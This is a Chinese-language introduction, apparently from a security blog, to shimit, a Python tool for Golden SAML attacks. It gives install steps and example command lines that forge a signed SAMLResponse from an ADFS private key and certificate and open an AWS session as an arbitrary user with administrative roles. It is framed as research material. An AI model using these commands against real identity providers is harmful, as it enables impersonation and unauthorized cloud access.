shimit是一款针对Golden SAML攻击的安全研究工具,该工具基于Python开发,可以帮助广大研究人员通过对目标执行Golden SAML攻击,来更好地学习和理解Golden SAML攻击,并保证目标应用的安全。
在Golden SAML攻击中,攻击者可以使用他们想要的任何权限访问应用程序(支持SAML身份验证的任何应用程序),并且可以是目标应用程序上的任何用户。
而shimit允许用户创建一个已签名的SAMLResponse对象,并使用它在服务提供商中打开会话。shimit现在支持AWS控制台作为服务提供商,更多的服务正在开发中...
该工具基于Python开发,因此我们首先需要在本地设备上安装并配置好Python环境。接下来,我们需要使用下列命令来安装该工具所需的其他依赖组件:
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
(向右滑动,查看更多)
除此之外,该工具还需要安装AWS cli以使用获取到的凭证:
【Windows下载】
http://docs.aws.amazon.com/cli/latest/userguide/awscli-install-windows.html
【Linux下载】
http://docs.aws.amazon.com/cli/latest/userguide/awscli-install-linux.html
广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/cyberark/shimit.git
(向右滑动,查看更多)
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n [email protected] -r ADFS-admin -r ADFS-monitor -id 123456789012
(向右滑动,查看更多)
参数解释:
idp - 识别服务提供商URL,例如http://server.domain.com/adfs/services/trust
pk - 私钥文件完整路径 (pem格式)
c - 证书文件完整路径 (pem格式)
u - 用户名和域名,例如domain\username
n - AWS中的会话名称
r - AWS中的目标角色,支持多个角色
id - AWS账号ID,例如123456789012
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml
(向右滑动,查看更多)
参数解释:
o - 将编码后的SAMLResponse编码到指定文件
python .\shimit.py -l saml_response.xml
参数解释:
l - 从指定文件加载SAMLResponse
本项目的开发与发布遵循GPL-3.0开源许可证协议。
shimit:https://github.com/cyberark/shimit
https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/
http://docs.aws.amazon.com/cli/latest/userguide/awscli-install-windows.html
http://docs.aws.amazon.com/cli/latest/userguide/awscli-install-linux.html
http://server.domain.com/adfs/services/trust
精彩推荐